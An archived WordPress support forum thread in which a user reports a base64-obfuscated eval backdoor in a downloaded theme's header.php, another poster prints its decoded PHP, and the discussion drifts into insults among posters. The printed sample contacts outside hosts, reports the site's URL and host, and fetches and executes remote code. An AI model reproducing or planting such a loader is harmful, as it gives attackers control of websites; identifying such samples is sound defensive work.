WordPress.org

Ready to get started?Download WordPress

Forums

Nasty base64 code in header.php - Can you decode (28 posts)

  1. bytesforall
    Member
    Posted 6 years ago #

    Downloaded a theme and found this in header.php. Unfortunately I shortly activated the theme on my server and I am afraid that it did something nasty there

    <?php @eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3IiOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIjsgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OTcgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3ODM2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgICRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cDovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLmNvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waHA/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMzM1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIEByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMTE1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7')); ?>

  2. RoseCitySister
    Member
    Posted 6 years ago #

    Here's what I got when I used OpinionatedGeek's decoder at http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx

    if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpssr.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3)) $R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr"; elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpsnc.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3)) $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc"; else $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc2"; @eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;'); if($R14AF1BE9EE26A90921E64A82E7836797 AND ini_get('allow_url_fopen')) { $RD3FE9C10A808A54EA2A3DBD9E605B696 = "1"; $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']); $R3E33E017CD76B9B7E6C7364FB91E2E90 = @file_get_contents($R6E4F14B335243BE656C65E3ED9E1B115); @eval($R3E33E017CD76B9B7E6C7364FB91E2E90); } else { $RD3FE9C10A808A54EA2A3DBD9E605B696 = "0"; $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']); @readfile($R6E4F14B335243BE656C65E3ED9E1B115); } fclose($R37C014DAE5FE4FE5C77B6735ABC30916);

  3. bytesforall
    Member
    Posted 6 years ago #

    Thanks a lot. I had the same result with some online decoder and thought it wasn't fully decoded yet but it probably is?

    Looks like it's trying it's own server availability and then sending the URL that the theme is running on and the surfers's IPS host name to it's servers, and sending a file to the surfer?

    Can anybody shed some light on what the script is doing?

  4. whooami
    Member
    Posted 6 years ago #

  5. bytesforall
    Member
    Posted 6 years ago #

    Not sure how that answers my question whooami. Go troll in another thread

  6. whooami
    Member
    Posted 6 years ago #

    it only answers your question if you actually read whats on those links.

    how about you go take your pissy attitude back to your hole. did you really need someone to regurgitate whats available elsewhere?

    Nice that you noticed the code, props for that, but dont take your bitchiness about it out on me. I didnt put it there.

  7. Joni
    Member
    Posted 6 years ago #

    Not sure how that answers my question whooami. Go troll in another thread

    and

    Can anybody shed some light on what the script is doing?

    You clearly don't know who you're dealing with. Whoo is a security expert, you nimrod. Can't be bothered to click on a link that might not only shed light on your problem but also help PREVENT you from making the mistake that brought you here in the first place?

    Un-freaking-believable.

  8. bytesforall
    Member
    Posted 6 years ago #

    Well whooami you where snippy from the get go. I apologize for not actually reading the content of the links and for calling your post trolling but you shouldn't need to get all shooked up now. I got to wpsphere through an Adsense ad on google.com an hour ago. I had to assume that their scam is fairly new or the ad wouldn't be running on #1 in adsense. I actually acted fairly knowledgable and figured it out quick, and reported them to adsense, too. And the links you mentioned do indeed NOT explain more than I already figured out myself, the second link mentions that it could be "very, very, very dangerous".

  9. bytesforall
    Member
    Posted 6 years ago #

    Great, yet another name caller arrived.

    The links didn't contain anything that I had not figured out myself. And obviously I was the first one to actually report them. So calm down jonimueller or whoever is going to chime in next.

  10. whooami
    Member
    Posted 6 years ago #

    im by no means an expert, but gee thanks :P

  11. RoseCitySister
    Member
    Posted 6 years ago #

    You're pretty knowledgeable, certainly more so than me! (Which of course isn't saying much.)

    Curious - I just read over the GPL to find out, and I think I know the answer, but just to make sure - you can, when releasing a theme, specify that it not be modified unless

    "a) The work must carry prominent notices stating that you modified it, and giving a relevant date."

    Can you specify that the theme not be distributed, and downloaded only from a specific place?

  12. Joni
    Member
    Posted 6 years ago #

    You can try, Rose. There was an outfit here a while back, I think Matt's lawyers finally shut him down b/c he had "WordPress" in his domain name, but he was selling some prepackaged WordPress with over 100 free themes (5 of them were ours) for $197 a pop. That was pretty galling if you ask me. So you can ASK, but the Internet isn't polite society, so I wouldn't count on that stopping anyone.

  13. Joni
    Member
    Posted 6 years ago #

    @Bytes .. Well you asked "Can anybody shed some light on it?" and immediately after, you got your answer in the form of some (helpful) links. So if you already knew the answer, why the question? Oh, and sorry, but I will decide when and whether I will sit down and shut up. But thanks for trying. My husband's been at it for over 30 years and he hasn't had any more luck than you. ;)

  14. RoseCitySister
    Member
    Posted 6 years ago #

    Actually, I should have been more clear. Can you specify that the theme not be distributed, and still release it under GPL? Forgive my ignorance - I can't figure out the answer to that from the license itself.

  15. Vast HTML
    Member
    Posted 6 years ago #

    when i download a theme that has that i see if they offer a live preview. if they do then view the source of the page and grab the code you need from there and use it instead of that other code.

    Example: if the scrambled code is in the footer than go to the live preview and view source, then scroll down till you get to the footer and take the code from the view source and replace the scrambled code with it.

    P.S whooami is a butt hole to every just ignore him.

  16. Lester Chan
    Member
    Posted 6 years ago #

    @erichamby whooami is a she if I am not wrong =D

  17. whooami
    Member
    Posted 6 years ago #

    no, just to you eric, you brainless girl.

    --

    you talk crap about me and dont have a clue -- just makes me laugh

    go sit on irc or s'thing, im sure your highschool buddies are waiting for you...

  18. whooami
    Member
    Posted 6 years ago #

    furthermore, back on topic, PHP is not going to be viewable in the source of any page -- encoded or not.

    Nice try eric.

  19. Vast HTML
    Member
    Posted 6 years ago #

    like you said before.. dont know much do you. not all coding is php genius. a lot of theme you download these days have the entire footer coded so you cant take out the footer links. This means divs, tables and everything. sorry but i have done this many times and it works perfect everytime.

    the last theme i did this on was http://web2feel.com/2008/05/19/toughpress/ and if you downland youll see the entire footer is coded. just go to the live preview and take the code you need from view source.

    and i think i know php isnt viewable in source genius

    Highschool?...... lmao

    PS, just becouse it has <?php @eval(@base64_decode dont mean its php in the coding

  20. whooami
    Member
    Posted 6 years ago #

    you ought to take a cue from that other thread where you so politely wrote

    "did you read.."

    this topic isnt about little spam links in the footer. its about PHP. consequently, your 'advice' is moot.

    follow?

    and just because .. doesnt matter either, as its already been decoded and thats PHP as well.

    are you following yet?

  21. Vast HTML
    Member
    Posted 6 years ago #

    like i said... Butt hole lol... and i know what the post is about. i was just giving some advice and tips... much better than what you did.

  22. whooami
    Member
    Posted 6 years ago #

    i know its tough to have your ass handed to you by a female.. and it probably really hurt your feelings to have me tell your little web site looked like shit in firefox way back when, but why dont you get over it already? You fixed your site.. Do you really have that fragile of an ego?

    --

    you fight with yourself eric, i have much better things to do than play games with 14 year olds.

  23. Vast HTML
    Member
    Posted 6 years ago #

    that comment really made no sence. and im sorry but the way your site looked back then you had no room to talk. ooo yea may have looked ok in firefox but it looked like crap to your eyes. and a simple google search will show im much older than 14.

    "have your ass handed to you by a female" lmao yea ok .. lmao

    do i have a fragile ego... lol no... but do you really have nothing better to do?

    And while you cant see php in source code you can see the outcome of the php so by viewing source code you can see what php code is there and then make your own header.php... genius

  24. whooami
    Member
    Posted 6 years ago #

    dude, get it thru your head.. thats NOT sending output to the browser.

    dont you get that? THATS NOT HTML, THATS NOT CSS. ITS PHP

    its executing code.

    Your 'advice' is fine when youre working with something that is outputted to the browser -- the above is NOT.

    youre making yourself look really dumb arguing with me when you clearly dont understand what we are talking about.

  25. whooami
    Member
    Posted 6 years ago #

    why dont you go put up your own little webpage and paste that into it. then you can bring that page up in your little browser and marvel at the source you see.

  26. Vast HTML
    Member
    Posted 6 years ago #

    ill tell you what... give me the theme and if the theme has a live demo give me an hour and ill have a header that is not encoded and works just has it should.. then we will see who is wrong lol. and your making yourself look dumb by saying you have better things to do than argue with me yet you keep doing it.

    heck ill do it without the live demo.... i dont really like to say im better than anyone, but ill be happy to prove im better than you anyday. of all the post on this site 95% of the comments you leave are just crap. you leave these crap comments to try to hurt people just to make yourself feel better. so yea, ill be more than happy to show i know more than you. i say to anyone seeing this to go to your site... and then o to my many many sites and just see who they think knows more...

    im so sorry that this post turned into this fight so i wont be saying anything else in here, so please feel free to get your final words in because i wont say anything back.

    and feel free to come and bash my other post i just left here about my 2 new themes. lol not like your comment have any meaning to them

  27. whooami
    Member
    Posted 6 years ago #

    ffs, what is wrong with you? the header was fine. it was the code being executed that was the problem.

    do you NOT understand this?

    you can have a page that looks like this, call this header.php:

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"><head profile="http://gmpg.org/xfn/11">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>blahblah</title>

    and that you can put this:

    <?php mail();?>

    right after that and the output of the header will be unchanged.

    what was in the PHP above didnt affect the source of the page. Its executing code in the background.

  28. Chris_K
    Member
    Posted 6 years ago #

    Can we all be done flexing at each other now?

Topic Closed

This topic has been closed to new replies.

About this Topic